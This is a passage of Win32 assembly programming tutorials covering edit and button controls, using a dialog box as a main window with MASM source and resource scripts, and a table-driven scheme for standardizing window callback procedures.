invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR ClassName, \
ADDR AppName, WS_OVERLAPPEDWINDOW,\
CW_USEDEFAULT, CW_USEDEFAULT,\
300,200,NULL,NULL, hInst,NULL
mov hwnd,eax
invoke ShowWindow, hwnd,SW_SHOWNORMAL
invoke UpdateWindow, hwnd
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_DESTROY
invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_CREATE
invoke CreateWindowEx,WS_EX_CLIENTEDGE, ADDR EditClassName,NULL,\
WS_CHILD or WS_VISIBLE or WS_BORDER or ES_LEFT or\
ES_AUTOHSCROLL,\
50,35,200,25,hWnd,8,hInstance,NULL
mov hwndEdit,eax
invoke SetFocus, hwndEdit
invoke CreateWindowEx,NULL, ADDR ButtonClassName,ADDR ButtonText,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
75,70,140,25,hWnd,ButtonID,hInstance,NULL
mov hwndButton,eax
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
.IF ax==IDM_HELLO
invoke SetWindowText,hwndEdit,ADDR TestString
.ELSEIF ax==IDM_CLEAR
invoke SetWindowText,hwndEdit,NULL
.ELSEIF ax==IDM_GETTEXT
invoke GetWindowText,hwndEdit,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
.ELSE
invoke DestroyWindow,hWnd
.ENDIF
.ELSE
.IF ax==ButtonID
shr eax,16
.IF ax==BN_CLICKED
invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
end start
Analysis:
Let's analyze the program.
.ELSEIF uMsg==WM_CREATE
invoke CreateWindowEx,WS_EX_CLIENTEDGE, \
ADDR EditClassName,NULL,\
WS_CHILD or WS_VISIBLE or WS_BORDER or
ES_LEFT\
or ES_AUTOHSCROLL,\
50,35,200,25,hWnd,EditID,hInstance,NULL
mov hwndEdit,eax
invoke SetFocus, hwndEdit
invoke CreateWindowEx,NULL, ADDR ButtonClassName,\
ADDR ButtonText,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
75,70,140,25,hWnd,ButtonID,hInstance,NULL
mov hwndButton,eax
We create the controls during processing of WM_CREATE message. We call
CreateWindowEx with an extra window style, WS_EX_CLIENTEDGE, which makes
the client area look sunken. The name of each control is a predefined one,
"edit" for edit control, "button" for button control. Next we specify the
child window's styles. Each control has extra styles in addition to the
normal window styles. For example, the button styles are prefixed with
"BS_" for "button style", edit styles are prefixed with "ES_" for "edit
style". You have to look these styles up in a Win32 API reference. Note
that you put a control ID in place of the menu handle. This doesn't cause
any harm since a child window control cannot have a menu.
After creating each control, we keep its handle in a variable for future
use.
SetFocus is called to give input focus to the edit box so the user can type
the text into it immediately.
Now comes the really exciting part. Every child window control sends
notification to its parent window with WM_COMMAND.
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
Recall that a menu also sends WM_COMMAND messages to notify the window
about its state too. How can you differentiate between WM_COMMAND messages
originated from a menu or a control? Below is the answer
Low word of wParam High word of wParam lParam
Menu Menu ID 0 0
Control Control ID Notification code Child Window Handle
You can see that you should check lParam. If it's zero, the current
WM_COMMAND message is from a menu. You cannot use wParam to differentiate
between a menu and a control since the menu ID and control ID may be
identical and the notification code may be zero.
.IF ax==IDM_HELLO
invoke SetWindowText,hwndEdit,ADDR TestString
.ELSEIF ax==IDM_CLEAR
invoke SetWindowText,hwndEdit,NULL
.ELSEIF ax==IDM_GETTEXT
invoke GetWindowText,hwndEdit,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
You can put a text string into an edit box by calling SetWindowText. You
clear the content of an edit box by calling SetWindowText with NULL.
SetWindowText is a general purpose API function. You can use SetWindowText
to change the caption of a window or the text on a button.
To get the text in an edit box, you use GetWindowText.
.IF ax==ButtonID
shr eax,16
.IF ax==BN_CLICKED
invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
.ENDIF
.ENDIF
The above code snippet deals with the condition when the user presses the
button. First, it checks the low word of wParam to see if the control ID
matches that of the button. If it is, it checks the high word of wParam to
see if it is the notification code BN_CLICKED which is sent when the button
is clicked.
The interesting part is after it's certain that the notification code is
BN_CLICKED. We want to get the text from the edit box and display it in a
message box. We can duplicate the code in the IDM_GETTEXT section above but
it doesn't make sense. If we can somehow send a WM_COMMAND message with the
low word of wParam containing the value IDM_GETTEXT to our own window
procedure, we can avoid code duplication and simplify our program.
SendMessage function is the answer. This function sends any message to any
window with any wParam and lParam we want. So instead of duplicating the
code, we call SendMessage with the parent window handle, WM_COMMAND,
IDM_GETTEXT, and 0. This has identical effect to selecting "Get Text" menu
item from the menu. The window procedure doesn't perceive any difference
between the two.
You should use this technique as much as possible to make your code more
organized.
Last but not least, do not forget the TranslateMessage function in the
message loop. Since you must type in some text into the edit box, your
program must translate raw keyboard input into readable text. If you omit
this function, you will not be able to type anything into your edit box.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Dialog Box as Main Window
by Iczelion
Now comes the really interesting part about GUI, the dialog box. In this
tutorial (and the next), we will learn how to use a dialog box as our main
window.
Theory
------
If you play with the examples in the previous tutorial long enough, you 'll
find out that you cannot change input focus from one child window control
to another with Tab key. The only way you can do that is by clicking the
control you want it to gain input focus. This situation is rather
cumbersome. Another thing you might notice is that I changed the background
color of the parent window to gray instead of normal white as in previous
examples. This is done so that the color of the child window controls can
blend seamlessly with the color of the client area of the parent window.
There is a way to get around this problem but it's not easy. You have to
subclass all child window controls in your parent window.
The reason why such inconvenience exists is that child window controls are
originally designed to work with a dialog box, not a normal window. The
default color of child window controls such as a button is gray because the
client area of a dialog box is normally gray so they blend into each other
without any sweat on the programmer's part.
Before we get deep into the detail, we should know first what a dialog box
is. A dialog box is nothing more than a normal window which is designed to
work with child window controls. Windows also provides internal "dialog box
manager" which is responsible for most of the keyboard logic such as
shifting input focus when the user presses Tab, pressing the default
pushbutton if Enter key is pressed, etc so programmers can deal with higher
level tasks. Dialog boxes are primarily used as input/output devices. As
such a dialog box can be considered as an input/output "black box" meaning
that you don't have to know how a dialog box works internally in order to
be able to use it, you only have to know how to interact with it. That's a
principle of object oriented programming (OOP) called information hiding.
If the black box is *perfectly* designed, the user can make use of it
without any knowledge on how it operates. The catch is that the black box
must be perfect, that's hard to achieve in the real world. Win32 API is
also designed as a black box too.
Well, it seems we stray from our path. Let's get back to our subject.
Dialog boxes are designed to reduce workload of a programmer. Normally if
you put child window controls on a normal window, you have to subclass them
and write keyboard logic yourself. But if you put them on a dialog box, it
will handle the logic for you. You only have to know how to get the user
input from the dialog box or how to send commands to it.
A dialog box is defined as a resource much the same way as a menu. You
write a dialog box template describing the characteristics of the dialog
box and its controls and then compile the resource script with a resource
editor.
Note that all resources are put together in the same resource script file.
You can use any text editor to write a dialog box template but I don't
recommend it. You should use a resource editor to do the job visually since
arranging child window controls on a dialog box is hard to do manually.
Several excellent resource editors are available. Most of the major
compiler suites include their own resource editors. You can use them to
create a resource script for your program and then cut out irrelevant lines
such as those related to MFC.
There are two main types of dialog box: modal and modeless. A modeless
dialog box lets you change input focus to other window. The example is the
Find dialog of MS Word. There are two subtypes of modal dialog box:
application modal and system modal. An application modal dialog box doesn't
let you change input focus to other window in the same application but you
can change the input focus to the window of OTHER application. A system
modal dialog box doesn't allow you to change input focus to any other
window until you respond to it first.
A modeless dialog box is created by calling CreateDialogParam API function.
A modal dialog box is created by calling DialogBoxParam. The only
distinction between an application modal dialog box and a system modal one
is the DS_SYSMODAL style. If you include DS_SYSMODAL style in a dialog box
template, that dialog box will be a system modal one.
You can communicate with any child window control on a dialog box by using
SendDlgItemMessage function. Its syntax is like this:
SendDlgItemMessage proto hwndDlg:DWORD,\
idControl:DWORD,\
uMsg:DWORD,\
wParam:DWORD,\
lParam:DWORD
This API call is immensely useful for interacting with a child window
control. For example, if you want to get the text from an edit control, you
can do this:
call SendDlgItemMessage, hDlg, ID_EDITBOX, WM_GETTEXT, 256, ADDR
text_buffer
In order to know which message to send, you should consult your Win32 API
reference.
Windows also provides several control-specific API functions to get and set
data quickly, for example, GetDlgItemText, CheckDlgButton etc. These
control-specific functions are provided for programmer's convenience so he
doesn't have to look up the meanings of wParam and lParam for each message.
Normally, you should use control-specific API calls when they're available
since they make source code maintenance easier. Resort to
SendDlgItemMessage only if no control-specific API calls are available.
The Windows dialog box manager sends some messages to a specialized
callback function called a dialog box procedure which has the following
format:
DlgProc proto hDlg:DWORD ,\
iMsg:DWORD ,\
wParam:DWORD ,\
lParam:DWORD
The dialog box procedure is very similar to a window procedure except for
the type of return value which is TRUE/FALSE instead of LRESULT. The
internal dialog box manager inside Windows IS the true window procedure for
the dialog box. It calls our dialog box procedure with some messages that
it received. So the general rule of thumb is that: if our dialog box
procedure processes a message,it MUST return TRUE in eax and if it does not
process the message, it must return FALSE in eax. Note that a dialog box
procedure doesn't pass the messages it does not process to the
DefWindowProc call since it's not a real window procedure.
There are two distinct uses of a dialog box. You can use it as the main
window of your application or use it as an input device. We 'll examine the
first approach in this tutorial.
"Using a dialog box as main window" can be interpreted in two different
senses.
1. You can use the dialog box template as a class template which you
register with RegisterClassEx call. In this case, the dialog box
behaves like a "normal" window: it receives messages via a window
procedure referred to by lpfnWndProc member of the window class, not
via a dialog box procedure. The benefit of this approach is that you
don't have to create child window controls yourself, Windows creates
them for you when the dialog box is created. Also Windows handles the
keyboard logic for you such as Tab order etc. Plus you can specify the
cursor and icon of your window in the window class structure.
Your program just creates the dialog box without creating any parent
window. This approach makes a message loop unnecessary since the
messages are sent directly to the dialog box procedure. You don't even
have to register a window class!
This tutorial is going to be a long one. I'll present the first approach
followed by the second.
Application
-----------
------------------------------------------------------------------------
dialog.asm
------------------------------------------------------------------------
.386
.model flat,stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
ClassName db "DLGCLASS",0
MenuName db "MyMenu",0
DlgName db "MyDialog",0
AppName db "Our First Dialog Box",0
TestString db "Wow! I'm in an edit box now",0
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)
.const
IDC_EDIT equ 3000
IDC_BUTTON equ 3001
IDC_EXIT equ 3002
IDM_GETTEXT equ 32000
IDM_CLEAR equ 32001
IDM_EXIT equ 32002
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess,eax
WinMain proc
hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hDlg:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,DLGWINDOWEXTRA
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_BTNFACE+1
mov wc.lpszMenuName,OFFSET MenuName
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL
mov hDlg,eax
invoke ShowWindow, hDlg,SW_SHOWNORMAL
invoke UpdateWindow, hDlg
invoke GetDlgItem,hDlg,IDC_EDIT
invoke SetFocus,eax
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke IsDialogMessage, hDlg, ADDR msg
.IF eax ==FALSE
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDIF
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_DESTROY
invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
.IF ax==IDM_GETTEXT
invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
.ELSEIF ax==IDM_CLEAR
invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
.ELSE
invoke DestroyWindow,hWnd
.ENDIF
.ELSE
mov edx,wParam
shr edx,16
.IF dx==BN_CLICKED
.IF ax==IDC_BUTTON
invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
.ELSEIF ax==IDC_EXIT
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
end start
------------------------------------------------------------------------
Dialog.rc
------------------------------------------------------------------------
#include "resource.h"
#define IDC_EDIT 3000
#define IDC_BUTTON 3001
#define IDC_EXIT 3002
#define IDM_GETTEXT 32000
#define IDM_CLEAR 32001
#define IDM_EXIT 32003
MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our First Dialog Box"
CLASS "DLGCLASS"
BEGIN
EDITTEXT IDC_EDIT, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
DEFPUSHBUTTON "Say Hello", IDC_BUTTON, 141,10,52,13
PUSHBUTTON "E&xit", IDC_EXIT, 141,26,52,13, WS_GROUP
END
MyMenu MENU
BEGIN
POPUP "Test Controls"
BEGIN
MENUITEM "Get Text", IDM_GETTEXT
MENUITEM "Clear Text", IDM_CLEAR
MENUITEM "", , 0x0800 /*MFT_SEPARATOR*/
MENUITEM "E&xit", IDM_EXIT
END
END
Analysis
--------
Let's analyze this first example.
This example shows how to register a dialog template as a window class and
create a "window" from that class. It simplifies your program since you
don't have to create the child window controls yourself.
Let's first analyze the dialog template.
MyDialog DIALOG 10, 10, 205, 60
Declare the name of a dialog, in this case, "MyDialog" followed by the
keyword "DIALOG". The following four numbers are: x, y , width, and height
of the dialog box in dialog box units (not the same as pixels).
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
Declare the styles of the dialog box.
CAPTION "Our First Dialog Box"
This is the text that will appear in the dialog box's title bar.
CLASS "DLGCLASS"
This line is crucial. It's this CLASS keyword that allows us to use the
dialog box template as a window class. Following the keyword is the name of
the "window class"
BEGIN
EDITTEXT IDC_EDIT, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
DEFPUSHBUTTON "Say Hello", IDC_BUTTON, 141,10,52,13
PUSHBUTTON "E&xit", IDC_EXIT, 141,26,52,13
END
The above block defines the child window controls in the dialog box.
They're defined between BEGIN and END keywords. Generally the syntax is as
follows:
control-type "text" ,controlID, x, y, width, height [,styles]
control-types are resource compiler's constants so you have to consult the
manual.
Now we go to the assembly source code. The interesting part is in the
window class structure:
mov wc.cbWndExtra,DLGWINDOWEXTRA
mov wc.lpszClassName,OFFSET ClassName
Normally, this member is left NULL, but if we want to register a dialog box
template as a window class, we must set this member to the value
DLGWINDOWEXTRA. Note that the name of the class must be identical to the
one following the CLASS keyword in the dialog box template. The remaining
members are initialized as usual. After you fill the window class
structure, register it with RegisterClassEx. Seems familiar? This is the
same routine you have to do in order to register a normal window class.
invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL
After registering the "window class", we create our dialog box. In this
example, I create it as a modeless dialog box with CreateDialogParam
function. This function takes 5 parameters but you only have to fill in the
first two: the instance handle and the pointer to the name of the dialog
box template. Note that the 2nd parameter is not a pointer to the class
name.
At this point, the dialog box and its child window controls are created by
Windows. Your window procedure will receive WM_CREATE message as usual.
invoke GetDlgItem,hDlg,IDC_EDIT
invoke SetFocus,eax
After the dialog box is created, I want to set the input focus to the edit
control. If I put these codes in WM_CREATE section, GetDlgItem call will
fail since at that time, the child window controls are not created yet. The
only way you can do this is to call it after the dialog box and all its
child window controls are created. So I put these two lines after the
UpdateWindow call. GetDlgItem function gets the control ID and returns the
associated control's window handle. This is how you can get a window handle
if you know its control ID.
invoke IsDialogMessage, hDlg, ADDR msg
.IF eax ==FALSE
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDIF
The program enters the message loop and before we translate and dispatch
messages, we call IsDialogMessage function to let the dialog box manager
handles the keyboard logic of our dialog box for us. If this function
returns TRUE , it means the message is intended for the dialog box and is
processed by the dialog box manager. Note another difference from the
previous tutorial. When the window procedure wants to get the text from the
edit control, it calls GetDlgItemText function instead of GetWindowText.
GetDlgItemText accepts a control ID instead of a window handle. That makes
the call easier in the case you use a dialog box.
------------------------------------------------------------------------
Now let's go to the second approach to using a dialog box as a main window.
In the next example, I 'll create an application modal dialog box. You'll
not find a message loop or a window procedure because they're not
necessary!
------------------------------------------------------------------------
dialog.asm (part 2)
------------------------------------------------------------------------
.386
.model flat,stdcall
option casemap:none
DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
DlgName db "MyDialog",0
AppName db "Our Second Dialog Box",0
TestString db "Wow! I'm in an edit box now",0
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)
.const
IDC_EDIT equ 3000
IDC_BUTTON equ 3001
IDC_EXIT equ 3002
IDM_GETTEXT equ 32000
IDM_CLEAR equ 32001
IDM_EXIT equ 32002
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL
invoke ExitProcess,eax
DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_INITDIALOG
invoke GetDlgItem, hWnd,IDC_EDIT
invoke SetFocus,eax
.ELSEIF uMsg==WM_CLOSE
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
.IF ax==IDM_GETTEXT
invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
.ELSEIF ax==IDM_CLEAR
invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
.ELSEIF ax==IDM_EXIT
invoke EndDialog, hWnd,NULL
.ENDIF
.ELSE
mov edx,wParam
shr edx,16
.if dx==BN_CLICKED
.IF ax==IDC_BUTTON
invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
.ELSEIF ax==IDC_EXIT
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
.ENDIF
.ENDIF
.ENDIF
.ELSE
mov eax,FALSE
ret
.ENDIF
mov eax,TRUE
ret
DlgProc endp
end start
------------------------------------------------------------------------
dialog.rc (part 2)
------------------------------------------------------------------------
#include "resource.h"
#define IDC_EDIT 3000
#define IDC_BUTTON 3001
#define IDC_EXIT 3002
#define IDR_MENU1 3003
#define IDM_GETTEXT 32000
#define IDM_CLEAR 32001
#define IDM_EXIT 32003
MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our Second Dialog Box"
MENU IDR_MENU1
BEGIN
EDITTEXT IDC_EDIT, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
DEFPUSHBUTTON "Say Hello", IDC_BUTTON, 141,10,52,13
PUSHBUTTON "E&xit", IDC_EXIT, 141,26,52,13
END
IDR_MENU1 MENU
BEGIN
POPUP "Test Controls"
BEGIN
MENUITEM "Get Text", IDM_GETTEXT
MENUITEM "Clear Text", IDM_CLEAR
MENUITEM "", , 0x0800 /*MFT_SEPARATOR*/
MENUITEM "E&xit", IDM_EXIT
END
END
------------------------------------------------------------------------
The analysis follows:
DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD
We declare the function prototype for DlgProc so we can refer to it with
addr operator in the line below:
invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL
The above line calls DialogBoxParam function which takes 5 parameters: the
instance handle, the name of the dialog box template, the parent window
handle, the address of the dialog box procedure, and the dialog-specific
data. DialogBoxParam creates a modal dialog box. It will not return until
the dialog box is destroyed.
.IF uMsg==WM_INITDIALOG
invoke GetDlgItem, hWnd,IDC_EDIT
invoke SetFocus,eax
.ELSEIF uMsg==WM_CLOSE
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
The dialog box procedure looks like a window procedure except that it
doesn't receive WM_CREATE message. The first message it receives is
WM_INITDIALOG. Normally you can put the initialization code here. Note that
you must return the value TRUE in eax if you process the message.
The internal dialog box manager doesn't send our dialog box procedure the
WM_DESTROY message by default when WM_CLOSE is sent to our dialog box. So
if we want to react when the user presses the close button on our dialog
box, we must process WM_CLOSE message. In our example, we send WM_COMMAND
message with the value IDM_EXIT in wParam. This has the same effect as when
the user selects Exit menu item. EndDialog is called in response to
IDM_EXIT.
The processing of WM_COMMAND messages remains the same.
When you want to destroy the dialog box, the only way is to call EndDialog
function. Do not try DestroyWindow! EndDialog doesn't destroy the dialog
box immediately. It only sets a flag for the internal dialog box manager
and continues to execute the next instructions.
Now let's examine the resource file. The notable change is that instead of
using a text string as menu name we use a value, IDR_MENU1. This is
necessary if you want to attach a menu to a dialog box created with
DialogBoxParam. Note that in the dialog box template, you have to add the
keyword MENU followed by the menu resource ID.
A difference between the two examples in this tutorial that you can readily
observe is the lack of an icon in the latter example. However, you can set
the icon by sending the message WM_SETICON to the dialog box during
WM_INITDIALOG.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Standardizing Win32 Callback Procedures
by Jeremy Gordon
This short article describes my preferred method for coding CALLBACK procedures
in a large assembler program for Windows 32. First I describe what Win32
callback procedures are, and then get down to some code.
At run time the Win32 system will call your program on a regular and frequent
basis. The procedures you supply for the system to call are called CALLBACK
procedures. Here are examples of when these are used:-
1. To manage a window you created. In this case the system will send many
messages to the Window Procedure for the window. The Window Procedure is
the code label you provide when you register your window class (by calling
RegisterClass). For example the message WM_SIZE is sent by the system
when the window is resized.
2. To inform the owner of a child window of events in the child window. For
example WM_PARENTNOTIFY (with a notify code) is sent to the Window
Procedure of the owner of a window when the child window is being created
or destroyed, or if the user clicks a mouse button while the cursor is
over the child window.
3. To inform the owner of a common control of events in the control. For
example if you create a button owned by your window the Window Procedure
for that window receives BN_CLICKED messages if the button is clicked.
4. Messages sent to a dialog you have created. These are messages relating
to the creation of the dialog and of the various controls. The dialog
procedure is informed of events in the controls.
5. If you "Superclass" or "Subclass" a common control, you receive messages
for that common control like a hook procedure but your window procedure
has the responsibility of passing them on to the control.
6. If you create "Hook" procedures you can intercept messages about to be sent
to other windows. The system will call your hook procedure and will pass
the message on only when your hook procedure returns.
7. You can ask the system to provide your program with information to be sent
to a CALLBACK procedure. Examples are EnumWindows (enumerate all top-level
windows) or EnumFonts (enumerate all available fonts).
In cases 1 to 5 above, just before the system calls the CALLBACK procedure,
it PUSHES 4 dwords on the stack (ie. 4 "parameters"). Traditionally the
names given to these parameters are:-
hWnd = handle of window being called
uMsg = message number
wParam = a parameter sent with the message
lParam = another parameter sent with the message.
The number of parameters sent to hook procedures and emumeration
callbacks varies - see the Window SDK.
Since your Window (or Dialog) procedure will need to react in a certain
way depending on the message being sent, your code will need to divert
execution to the correct place for a particular message.
"C" programmers have the advantage of being able to code this simply,
using "switch" and "case".
Assembler programmers use various techniques. Perhaps the worst if there are
a lot of messages to handle is the chain of compares, eg. (in A386 format):-
MOV EAX,[EBP+0Ch] ;get message number
CMP EAX,1h ;see if WM_CREATE
JNZ >L2 ;no
XOR EAX,EAX ;ensure eax is zero on exit
JMP >L32 ;finish
L2:
CMP EAX,116h ;see if WM_INITMENU
JNZ >L4 ;no
CALL INITIALISE_MENU
JMP >L30 ;correct exit code
L4:
CMP EAX,47h ;see if WM_WINDOWPOSCHANGED
JNZ >L8
and so on ........
To avoid these long chains, assembler programmers have developed various
techniques. You will have seen many of these in sample code around Win32
assembler web sites and in the asm journal, using conditional jumps, macros
or table scans. I do not wish to compare these various methods, merely to put
forward my own current favourite, which I believe has these advantages:-
1. It works on all assemblers
2. It is modular, ie. the code for each window can be concentrated in a
particular part of your source code
3. It is easy to follow from the source code what message causes what result
4. The same function can easily be called from within different window
procedures
My method results in a very simple Window Procedure as follows (A386 format):-
WndProc:
MOV EDX,OFFSET MAINMESSAGES
CALL GENERAL_WNDPROC
RET 10h
where the messages and functions (specific to this particular window
procedure) are set out in a table such as this:-
;----------------------------------------------------------
DATA SEGMENT FLAT ;assembler to put following in data section
;--------------------------- WNDPROC message functions
MAINMESSAGES DD ENDOF_MAINMESSAGES-$ ;=number to be done
DD 312h,HOTKEY,116h,INITMENU,117h,INITMENUPOPUP,11Fh,MENUSELECT
DD 1h,CREATE,2h,DESTROY, 410h,OWN410,411h,OWN411
DD 231h,ENTERSIZEMOVE,47h,WINDOWPOSCHANGED,24h,GETMINMAXINFO
DD 1Ah,SETTINGCHANGE,214h,SIZING,46h,WINDOWPOSCHANGING
DD 2Bh,DRAWITEM,0Fh,PAINT,113h,TIMER,111h,COMMAND
DD 104h,SYSKEYDOWN,100h,KEYDOWN,112h,SYSCOMMAND
DD 201h,LBUTTONDOWN,202h,LBUTTONUP,115h,SCROLLMESS
DD 204h,RBUTTONDOWNUP,205h,RBUTTONDOWNUP
DD 200h,MOUSEMOVE,0A0h,NCMOUSEMOVE,20h,SETCURSORM
DD 4Eh,NOTIFY,210h,PARENTNOTIFY,86h,NCACTIVATE,6h,ACTIVATE
DD 1Ch,ACTIVATEAPP
ENDOF_MAINMESSAGES: ;label used to work out how many messages
;----------------------------------------------------------
_TEXT SEGMENT FLAT ;assembler to put following in code section
;----------------------------------------------------------
and where each of the functions here are procedures, for example:-
CREATE:
XOR EAX,EAX ;ensure zero and nc return
RET
and where GENERAL_WINDPROC is as follows:-
GENERAL_WNDPROC:
PUSH EBP
MOV EBP,[ESP+10h] ;get uMsg in ebp
MOV ECX,[EDX] ;get number of messages to do * 8 (+4)
SHR ECX,3 ;get number of messages to do
ADD EDX,4 ;jump over size dword
L33:
DEC ECX
JS >L46 ;s=message not found
CMP [EDX+ECX*8],EBP ;see if its the correct message
JNZ L33 ;no
MOV EBP,ESP
PUSH ESP,EBX,EDI,ESI ;save registers as required by Windows
ADD EBP,4 ;allow for the extra call to here
;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
CALL [EDX+ECX*8+4] ;call correct procedure for the message
POP ESI,EDI,EBX,ESP
JNC >L48 ;nc=don't call DefWindowProc eax=exit code
L46:
PUSH [ESP+18h],[ESP+18h],[ESP+18h],[ESP+18h] ;ESP changes on push
CALL DefWindowProcA
L48:
POP EBP
RET
NOTES:
-------------------------------------------------------------------------------
1. Instead of giving the actual message value, you can, of course, give
the name of an EQUATE. For example
WM_CREATE EQU 1h
enables you to use WM_CREATE,CREATE instead of 1h,CREATE if you wish.
2. It is tempting to keep the message table in the CODE SECTION. This is
perfectly possible because the only difference to the Win32 system between
the code section and the data section is that the code section area of
memory is marked read only, whereas the data section is read/write.
However, you may well get some loss of performance if you do this because
most processors will read data more quickly from the data section.
I performed some tests on this and found that having the table in the code
section rather than the data section could slow the code considerably:-
486 processor - 22% to 36% slower
Pentium processor - 94% to 161% slower
AMD-K6-3D processor - 78% to 193% slower
(but Pentium Pro - from 7% faster to 9% slower)
(and Pentium II - from 29% faster to 5% slower)
These tests were carried out on a table of 60 messages and the range of
results is because tests were carried out varying the number of scans
required before a find and also testing a no-find.
3. The procedure names must not be the names of API imports to avoid
confusion! For example change SETCURSOR slightly to avoid confusion
with the API SetCursor.
4. If a function returns c (carry flag set) the window procedure will call
DefWindowProc. An nc return (carry flag not set) will merely return to
the system with the return code in eax. (Some messages must be dealt with
in this way).
5. You can send a parameter of your own to GENERAL_WNDPROC using EAX.
This is useful if you wish to identify a particular window.
For example:-
SpecialWndProc:
MOV EAX,OFFSET hSpecialWnd
MOV EDX,OFFSET SPECIALWND_MESSAGES
CALL GENERAL_WNDPROC
RET 10h
6. The ADD EBP,4 just before the call to the function is to ensure that
EBP points to the parameters the stack in the same way as if the window
procedure had been entered normally. This is intended to ensure that
the function will be compatible if called by an ordinary window procedure
